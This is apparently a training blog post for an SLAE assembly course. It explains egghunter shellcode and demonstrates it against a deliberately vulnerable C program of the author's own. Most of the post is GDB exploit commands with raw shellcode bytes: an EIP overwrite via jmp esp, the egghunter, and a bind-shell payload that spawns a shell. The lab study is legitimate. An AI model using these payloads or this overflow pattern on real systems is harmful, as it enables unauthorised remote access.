Wednesday 15 June 2016

x86 egghunter shellcode research & example

For the third part of my SLAE (http://www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/) assignments, I have to research a topic which was not covered under the course - egghunter shellcode.   I will document my findings here and some example code as a proof of concept.

I took to reading the legendary skape's research paper on egghunters, which can be found here: http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf - the idea is a feindishly simple but effective method to use a two-stage shellcode where you only have a small amount of space in predictable memory space and have to use this to find the larger part of shellcode.

In order to do this, the smaller shellcode - the "egghunter" will look for a fixed set of bytes which demarkate the beginning of the larger shellcode section.  Cleverly, the beginning of the larger shellcode begins with this signature not once but twice - in order that the egghunter doesn't detect the signature within its own code.  The egghunter allows for this and ensure that the egg is found repeated twice, while searching over memory in a loop.

While we are limiting the scope of this research to Linux, I will use at one of the three linux egghunter examples provided in the whitepaper;

39 bytes access() system-call
35 bytes access() system-call
30 bytes sigaction() system-call    <----this one :-)

As we can see, these shellcodes as significantly smaller than your average bind or reverse shell.

I put together a quick C program to demonstrate how an egghunter shellcode could work for both heap-based and stack-based second stages as follows;

1:  #include <stdio.h>  
2:  #include <stdlib.h>  
3:  #include <string.h>  
4:    
5:    
6:  int main(int argc, char *argv[])  
7:  {  
8:    char *stuff = (char*)malloc(200 * sizeof(char));  
9:    stuff = argv[1];  
10:    
11:    printf("argv[1] = %s\n", argv[1]);  
12:    printf("&argv[1] = %p\n", &argv[1]);  
13:    
14:    printf("argv[2] = %s\n", argv[2]);  
15:    printf("&argv[2] = %p\n", &argv[2]);  
16:    
17:    printf("stuff = %s\n", stuff);  
18:    printf("&stuff = %p\n", &stuff);  
19:      
20:    
21:    char buf[5];  
22:    strncpy(buf, argv[2], 60);  
23:    printf("buf = %s\n", buf);  
24:    
25:    
26:    
27:    int count;  
28:    
29:  //to crash (within gdb)  
30:  //r 1 `perl -e 'print "A"x21 . "B"x4 . "C"x35;'`  
31:    
32:    return 0;  
33:  }  
34:    

As you can see, the sample vulnerable program accepts two arguments, putting the value of the first (upto 200 bytes) onto space on the heap assigned by malloc and doing a bad strncpy on the second argv into an undersized buffer.  I've done it this way so we can see that you can use either heap or stack for the second stage of the shellcode.

The strncpy allows the buffer overflow and overwrite of EIP (where the B's are within the example GDB crash) but then followed by only 35 bytes for the shellcode (esp points to the beginning of the C's).

The 35 bytes isn't a lot of space for a shellcode so this is where the egghunter is going to come in handy.  Of course, you could try and scavenge the 21 bytes used by the A's with a jmp at the end of the initial shellcode section but this would only give you 56 bytes and anyway this is an egghunter exercise :)

So we can either choose to put our second-stage shellcode onto the heap via the first argument and hunting it using the egghunter, OR, putting the second-stage shellcode onto the lower section of the stack with the rest of the programs environment, in this example I will do the former.

As we can see below, both the stack and heap addresses are randomised, due to ASLR :-)

 paul@SLAE001:~$ gcc egghunter.c -o egghunter -g -fno-stack-protector -z execstack  
 paul@SLAE001:~$ ./egghunter 111 222  
 argv[1] = 111  
 &argv[1] = 0xbfa5ea28  
 argv[2] = 222  
 &argv[2] = 0xbfa5ea2c  
 stuff = 111  
 &stuff = 0xbfa5e97c  
 buf = 222  
 Segmentation fault (core dumped)  
 paul@SLAE001:~$ ./egghunter 111 222  
 argv[1] = 111  
 &argv[1] = 0xbfc77868  
 argv[2] = 222  
 &argv[2] = 0xbfc7786c  
 stuff = 111  
 &stuff = 0xbfc777bc  
 buf = 222  
 ...  


With knowledge that the C's line up with esp, our next step is to find a jmp esp, we will do this within GDB by first locating libc and then searching within it for the right opcodes (0xff, 0xe4);

 (gdb) info proc mappings   
 process 4369  
 Mapped address spaces:  
   
      Start Addr  End Addr    Size   Offset objfile  
       0x8048000 0x8060000  0x18000    0x0 /bin/dash  
       0x8060000 0x8061000   0x1000  0x17000 /bin/dash  
       0x8061000 0x8062000   0x1000  0x18000 /bin/dash  
       0x8062000 0x8085000  0x23000    0x0 [heap]  
      0xb7e21000 0xb7e22000   0x1000    0x0   
      0xb7e22000 0xb7fc5000  0x1a3000    0x0 /lib/i386-linux-gnu/libc-2.15.so  
      0xb7fc5000 0xb7fc7000   0x2000  0x1a3000 /lib/i386-linux-gnu/libc-2.15.so  
      0xb7fc7000 0xb7fc8000   0x1000  0x1a5000 /lib/i386-linux-gnu/libc-2.15.so  
      0xb7fc8000 0xb7fcb000   0x3000    0x0   
      0xb7fdb000 0xb7fdd000   0x2000    0x0   
      0xb7fdd000 0xb7fde000   0x1000    0x0 [vdso]  
      0xb7fde000 0xb7ffe000  0x20000    0x0 /lib/i386-linux-gnu/ld-2.15.so  
      0xb7ffe000 0xb7fff000   0x1000  0x1f000 /lib/i386-linux-gnu/ld-2.15.so  
      0xb7fff000 0xb8000000   0x1000  0x20000 /lib/i386-linux-gnu/ld-2.15.so  
      0xbffdf000 0xc0000000  0x21000    0x0 [stack]  
 (gdb) find /b 0xb7e22000, 0xb7fc5000, 0xff, 0xe4  
 0xb7e24a55  
 0xb7f7b00b  
 ...  

Many come back, we will take the first one and replace the B's with this address, testing this by first landing on a soft breakpoint and then a second attempt where we land into the egghunter, after feeding the egg into the heap, followed by another soft breakpoint;

 (gdb) r `perl -e 'print "AAAA";'` `perl -e 'print "A"x21 . "\x55\x4a\xe2\xb7" . "\xcc\xcc\xcc\xcc" . "C"x31;'`  
 Starting program: /home/paul/egghunter `perl -e 'print "AAAA";'` `perl -e 'print "A"x21 . "\x55\x4a\xe2\xb7" . "\xcc\xcc\xcc\xcc" . "C"x31;'`  
 argv[1] = AAAA  
 &argv[1] = 0xbffff728  
 argv[2] = AAAAAAAAAAAAAAAAAAAAAUJ������CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC  
 &argv[2] = 0xbffff72c  
 stuff = AAAA  
 &stuff = 0xbffff67c  
 buf = AAAAAAAAAAAAAAAAAAAAAUJ������CCCCCCCCCCCCCCCCCCCCCCCCCCCCCC�o��  
   
 Program received signal SIGTRAP, Trace/breakpoint trap.  
 0xbffff691 in ?? ()  
 (gdb) r `perl -e 'print "\x90\x50\x90\x50\x90\x50\x90\x50" . "\xcc\xcc\xcc\xcc";'` `perl -e 'print "A"x21 . "\x55\x4a\xe2\xb7" . "\x66\x81\xC9\xFF\x0F\x41\x6A\x43\x58\xCD\x80\x3C\xF2\x74\xF1\xB8\x90\x50\x90\x50\x89\xCF\xAF\x75\xEC\xAF\x75\xE9\xFF\xE7" . "C"x5;'`  
 The program being debugged has been started already.  
 Start it from the beginning? (y or n) y  
   
 Starting program: /home/paul/egghunter `perl -e 'print "\x90\x50\x90\x50\x90\x50\x90\x50" . "\xcc\xcc\xcc\xcc";'` `perl -e 'print "A"x21 . "\x55\x4a\xe2\xb7" . "\x66\x81\xC9\xFF\x0F\x41\x6A\x43\x58\xCD\x80\x3C\xF2\x74\xF1\xB8\x90\x50\x90\x50\x89\xCF\xAF\x75\xEC\xAF\x75\xE9\xFF\xE7" . "C"x5;'`  
 argv[1] = �P�P�P�P����  
 &argv[1] = 0xbffff718  
 argv[2] = AAAAAAAAAAAAAAAAAAAAAUJ��f���AjCX̀<�t���P�P�ϯu��u���CCCCC  
 &argv[2] = 0xbffff71c  
 stuff = �P�P�P�P����  
 &stuff = 0xbffff66c  
 buf = AAAAAAAAAAAAAAAAAAAAAUJ��f���AjCX̀<�t���P�P�ϯu��u���CCCC�o��  
   ...couple of seconds delay here while memory is searched...
 Program received signal SIGTRAP, Trace/breakpoint trap.  
 0xbffff869 in ?? ()  
 (gdb)   
   

Okay, this worked nicely :-)  For the final step we are going to put onto the heap the egg followed by a bind shellcode and test this;

 (gdb) r `perl -e 'print "\x90\x50\x90\x50\x90\x50\x90\x50" . "\x31\xc0\x31\xdb\x31\xf6\xb3\x01\x56\x6a\x01\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x89\xc2\xb3\x02\x56\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd\x80\xb3\x04\x56\x52\x89\xe1\xb0\x66\xcd\x80\xb3\x05\x56\x56\x52\x89\xe1\xb0\x66\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\x41\x83\xf9\x03\x75\xf6\xb0\x0b\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xcd\x80";'` `perl -e 'print "A"x21 . "\x55\x4a\xe2\xb7" . "\x66\x81\xC9\xFF\x0F\x41\x6A\x43\x58\xCD\x80\x3C\xF2\x74\xF1\xB8\x90\x50\x90\x50\x89\xCF\xAF\x75\xEC\xAF\x75\xE9\xFF\xE7" . "C"x5;'`  
 The program being debugged has been started already.  
 Start it from the beginning? (y or n) y  
   
 Starting program: /home/paul/egghunter `perl -e 'print "\x90\x50\x90\x50\x90\x50\x90\x50" . "\x31\xc0\x31\xdb\x31\xf6\xb3\x01\x56\x6a\x01\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x89\xc2\xb3\x02\x56\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd\x80\xb3\x04\x56\x52\x89\xe1\xb0\x66\xcd\x80\xb3\x05\x56\x56\x52\x89\xe1\xb0\x66\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\x41\x83\xf9\x03\x75\xf6\xb0\x0b\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xcd\x80";'` `perl -e 'print "A"x21 . "\x55\x4a\xe2\xb7" . "\x66\x81\xC9\xFF\x0F\x41\x6A\x43\x58\xCD\x80\x3C\xF2\x74\xF1\xB8\x90\x50\x90\x50\x89\xCF\xAF\x75\xEC\xAF\x75\xE9\xFF\xE7" . "C"x5;'`  
 argv[1] = �P�P�P�P1�1�1�� Vj j ���f̀�³ Vfh \fj ��j QP���f̀� VR���f̀�VVR���f̀��1ɰ?̀A�� u��  
                                           Vh//shh/bin��1�1�̀  
 &argv[1] = 0xbffff6b8  
 argv[2] = AAAAAAAAAAAAAAAAAAAAAUJ��f���AjCX̀<�t���P�P�ϯu��u���CCCCC  
 &argv[2] = 0xbffff6bc  
 stuff = �P�P�P�P1�1�1�� Vj j ���f̀�³ Vfh \fj ��j QP���f̀� VR���f̀�VVR���f̀��1ɰ?̀A�� u��  
                                          Vh//shh/bin��1�1�̀  
 &stuff = 0xbffff60c  
 buf = AAAAAAAAAAAAAAAAAAAAAUJ��f���AjCX̀<�t���P�P�ϯu��u���CCCC�o��  
 process 4399 is executing new program: /bin/dash  
   
   


Awesome!  This worked!  The C file used for this research post can be found here: https://github.com/pabb85/SLAE/blob/master/egghunter.c


Connecting to my egghunter-found bind shell :-)


This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification, Student ID:  SLAE-469.